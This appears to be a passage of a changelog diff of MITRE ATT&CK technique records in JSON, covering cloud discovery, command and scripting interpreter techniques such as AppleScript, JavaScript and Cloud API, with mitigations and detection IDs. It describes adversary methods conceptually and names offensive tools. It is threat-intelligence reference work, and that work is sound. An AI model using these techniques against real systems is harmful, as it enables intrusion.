+                    "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685) or [Disable or Modify Cloud Log](https://attack.mitre.org/techniques/T1685/002).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1526",
+                            "external_id": "T1526"
+                        },
+                        {
+                            "source_name": "Azure AD Graph API",
+                            "description": "Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview"
+                        },
+                        {
+                            "source_name": "Azure - Resource Manager API",
+                            "description": "Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/rest/api/resources/"
+                        },
+                        {
+                            "source_name": "Azure - Stormspotter",
+                            "description": "Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020.",
+                            "url": "https://github.com/Azure/Stormspotter"
+                        },
+                        {
+                            "source_name": "GitHub Pacu",
+                            "description": "Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019.",
+                            "url": "https://github.com/RhinoSecurityLabs/pacu"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Suzy Schapperle - Microsoft Azure Red Team",
+                        "Praetorian",
+                        "Thanabodi Phrakhun, I-SECURE",
+                        "Arun Seelagan, CISA"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Identity Provider",
+                        "Office Suite",
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2026-04-17 14:17:35.798000+00:00\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0402: Detection Strategy for Cloud Service Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8565825b-21c8-4518-b75e-cbc4c717a156",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-01 17:58:26.445000+00:00",
+                    "modified": "2026-05-12 15:12:00.685000+00:00",
+                    "name": "Cloud Storage Object Discovery",
+                    "description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1619",
+                            "external_id": "T1619"
+                        },
+                        {
+                            "source_name": "ListObjectsV2",
+                            "description": "Amazon - ListObjectsV2. Retrieved October 4, 2021.",
+                            "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html"
+                        },
+                        {
+                            "source_name": "List Blobs",
+                            "description": "Microsoft - List Blobs. (n.d.). Retrieved October 4, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Regina Elwell",
+                        "Isif Ibrahima, Mandiant"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.685000+00:00\", \"old_value\": \"2025-10-24 17:49:03.853000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0578: Detection Strategy for Cloud Storage Object Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:49.546000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Command and Scripting Interpreter",
+                    "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059",
+                            "external_id": "T1059"
+                        },
+                        {
+                            "source_name": "Remote Shell Execution in Python",
+                            "description": "Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.",
+                            "url": "https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python"
+                        },
+                        {
+                            "source_name": "Cisco IOS Software Integrity Assurance - Command History",
+                            "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.",
+                            "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23"
+                        },
+                        {
+                            "source_name": "Powershell Remote Commands",
+                            "description": "Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2026-01-27 20:03:38.098000+00:00\"}}}",
+                    "previous_version": "2.7",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1026: Privileged Account Management",
+                            "M1033: Limit Software Installation",
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1045: Code Signing",
+                            "M1047: Audit",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0516: Behavioral Detection of Command and Scripting Interpreter Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 14:07:54.329000+00:00",
+                    "modified": "2026-05-12 15:12:00.626000+00:00",
+                    "name": "AppleScript",
+                    "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e \"script here\"</code>. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding <code>#!/usr/bin/osascript</code> to the start of the script file.(Citation: SentinelOne AppleScript)\n\nAppleScripts do not need to call <code>osascript</code> to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s\u00a0<code>NSAppleScript</code>\u00a0or\u00a0<code>OSAScript</code>, both of which execute code independent of the <code>/usr/bin/osascript</code> command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/002",
+                            "external_id": "T1059.002"
+                        },
+                        {
+                            "source_name": "Apple AppleScript",
+                            "description": "Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020.",
+                            "url": "https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html"
+                        },
+                        {
+                            "source_name": "SentinelOne macOS Red Team",
+                            "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.",
+                            "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/"
+                        },
+                        {
+                            "source_name": "SentinelOne AppleScript",
+                            "description": "Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.",
+                            "url": "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/"
+                        },
+                        {
+                            "source_name": "Macro Malware Targets Macs",
+                            "description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.",
+                            "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Phil Stokes, SentinelOne"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.626000+00:00\", \"old_value\": \"2025-10-24 17:48:39.348000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1045: Code Signing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0414: Detection of AppleScript-Based Execution on macOS"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-03-17 13:28:24.989000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Cloud API",
+                    "description": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).  \n\nCloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.\n\nWith proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/009",
+                            "external_id": "T1059.009"
+                        },
+                        {
+                            "source_name": "Microsoft - Azure PowerShell",
+                            "description": "Microsoft. (2014, December 12). Azure/azure-powershell. Retrieved March 24, 2023.",
+                            "url": "https://github.com/Azure/azure-powershell"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ozan Olali",
+                        "Nichols Jasper",
+                        "Jason Sevilla",
+                        "Marcus Weeks",
+                        "Caio Silva"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Identity Provider",
+                        "Office Suite",
+                        "SaaS"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2025-04-15 19:58:32.612000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0078: Behavioral Detection of Malicious Cloud API Scripting"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-23 19:12:24.924000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "JavaScript",
+                    "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple\u2019s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple\u2019s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple\u2019s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/007",
+                            "external_id": "T1059.007"
+                        },
+                        {
+                            "source_name": "Apple About Mac Scripting 2016",
+                            "description": "Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021.",
+                            "url": "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html"
+                        },
+                        {
+                            "source_name": "MDSec macOS JXA and VSCode",
+                            "description": "Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021.",
+                            "url": "https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/"
+                        },
+                        {
+                            "source_name": "Microsoft JScript 2007",
+                            "description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript \u2026. Retrieved June 23, 2020.",
+                            "url": "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript"
+                        },
+                        {
+                            "source_name": "Microsoft Windows Scripts",
+                            "description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020.",
+                            "url": "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces"
+                        },
+                        {
+                            "source_name": "JScrip May 2018",
+                            "description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020.",
+                            "url": "https://docs.microsoft.com/windows/win32/com/translating-to-jscript"
+                        },
+                        {
+                            "source_name": "NodeJS",
+                            "description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.",
+                            "url": "https://nodejs.org/"
+                        },
+                        {
+                            "source_name": "SentinelOne macOS Red Team",
+                            "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.",
+                            "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/"
+                        },
+                        {
+                            "source_name": "SpecterOps JXA 2020",
+                            "description": "Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021.",
+                            "url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5"
+                        },
+                        {
+                            "source_name": "Red Canary Silver Sparrow Feb2021",
+                            "description": "Tony Lambert. (2021, February 18). Clipping Silver Sparrow\u2019s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021.",
+                            "url": "https://redcanary.com/blog/clipping-silver-sparrows-wings/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Cody Thomas, SpecterOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:24.217000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0264: Cross-Platform Detection of JavaScript Execution Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-20 00:09:33.072000+00:00",
+                    "modified": "2026-05-12 15:12:00.670000+00:00",
+                    "name": "Network Device CLI",
+                    "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/008",
+                            "external_id": "T1059.008"
+                        },
+                        {
+                            "source_name": "Cisco IOS Software Integrity Assurance - Command History",
+                            "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.",
+                            "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23"
+                        },
+                        {
+                            "source_name": "Cisco Synful Knock Evolution",
+                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
+                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.670000+00:00\", \"old_value\": \"2025-10-24 17:49:02.287000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0142: Behavioral Detection of CLI Abuse on Network Devices"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 13:48:55.078000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "PowerShell",
